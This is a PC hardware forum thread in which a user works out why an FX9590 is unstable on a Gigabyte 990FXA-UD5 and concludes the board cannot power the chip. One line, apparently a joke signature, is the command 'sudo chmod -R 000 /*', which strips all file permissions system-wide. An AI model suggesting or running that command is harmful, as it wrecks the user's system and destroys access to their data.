FX9590 not playing ball

I'm testing an FX9590 on a Gigabyte 990FXA-UD5 rev 3.0 (one of the boards that supports it), however having some trouble. The system is not stable at stock speed (4.7GHz) under Prime95, with or without XMP on. The PSU is a Corsair TX850, and temps are fine. I tried to lower the multiplier but anything other than 23.5 will not boot. Any ideas how to get this thing working?

You could try a different set of ram.

Where does this cpu come from? Maybe it's DOA...

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

I doubt it's VRMs as the errors are happening in the first minute or two of running. RAM is also tested elsewhere.

33 minutes ago, DDebbil said:

Gigabyte 990FXA-UD5

latest BIOS installed?

Memory OK?

"Hell is full of good meanings, but Heaven is full of good works"

1 minute ago, DDebbil said:

RAM is also tested elsewhere.

You need to test the Memory in this Board.

And what Heatsink are you using?

What BIOS Version??

"Hell is full of good meanings, but Heaven is full of good works"

25 minutes ago, DDebbil said:

Test the RAM in this board how?

Memtest.

https://www.memtest86.com

CPU: AMD Ryzen 5 5600X | CPU Cooler: Stock AMD Cooler | Motherboard: Asus ROG STRIX B550-F GAMING (WI-FI) | RAM: Corsair Vengeance LPX 16 GB (2 x 8 GB) DDR4-3000 CL16 | GPU: Nvidia GTX 1060 6GB Zotac Mini | Case: K280 Case | PSU: Cooler Master B600 Power supply | SSD: 1TB  | HDDs: 1x 250GB & 1x 1TB WD Blue | Monitors: 24" Acer S240HLBID + 24" Samsung  | OS: Win 10 Pro

Audio: Behringer Q802USB Xenyx 8 Input Mixer |  U-PHORIA UMC204HD | Behringer XM8500 Dynamic Cardioid Vocal Microphone | Sound Blaster Audigy Fx PCI-E card.

Home Lab:  Lenovo ThinkCenter M82 ESXi 6.7 | Lenovo M93 Tiny Exchange 2019 | TP-LINK TL-SG1024D 24-Port Gigabit | Cisco ASA 5506 firewall  | Cisco Catalyst 3750 Gigabit Switch | Cisco 2960C-LL | HP MicroServer G8 NAS | Custom built SCCM Server.

I don't think Memtest will allow me to isolate RAM problems from CPU problems.

If you have an issue with your memory Memtest will rule this out at least, you can then move on to more invasive testing. Its worth doing trust me, i resolved an issue for me in confirming my first set of memory in my new build was bad.

My Current Build: https://uk.pcpartpicker.com/list/36jXwh

CPU: AMD - Ryzen 5 3600X | CPU Cooler: Corsair H150i PRO XT | Motherboard: Asus - STRIX X370-F GAMING | RAM: G.SKILL Trident Z RGB 2x8Gb DDR4 @3000MHz | GPU: Gigabyte - GeForce RTX 2080 Ti 11 GB AORUS XTREME Video Card | Storage: Samsung - 860 EVO 250GB M.2-2280 - Sandisk SSD 240GB - Sandisk SSD 1TB - WD Blue 4TB| PSU: Corsair RM (2019) 850 W 80+ Gold Certified Fully Modular ATX Power Supply | Case: Corsair - Corsair Obsidian 500D RGB SE ATX Mid Tower Case | System Fans: Corsair - ML120 PRO RGB 47.3 CFM 120mm x 4 & Corsair - ML140 PRO RGB 55.4 CFM 140mm x 2 | Display: Samsung KS9000 |Keyboard: Logitech - G613 | Mouse: Logitech - G703 | Operating System: Windows 10 Pro

Ok so an update after some more testing:

I ran an FX9370 in the board and that was fine, so I'm sure the RAM is fine now.

I ran the FX9590 in a Sabertooth 990FX R2.0 and that was fine, so I'm sure the CPU is ok.

Put the FX9590 back in the 990FXA UD5 and errors within 1 minute.

So it seems like the motherboard cannot run this CPU despite being cleared to run it. It can only run up to the 9370, but the extra power needed by the 9590 does it in.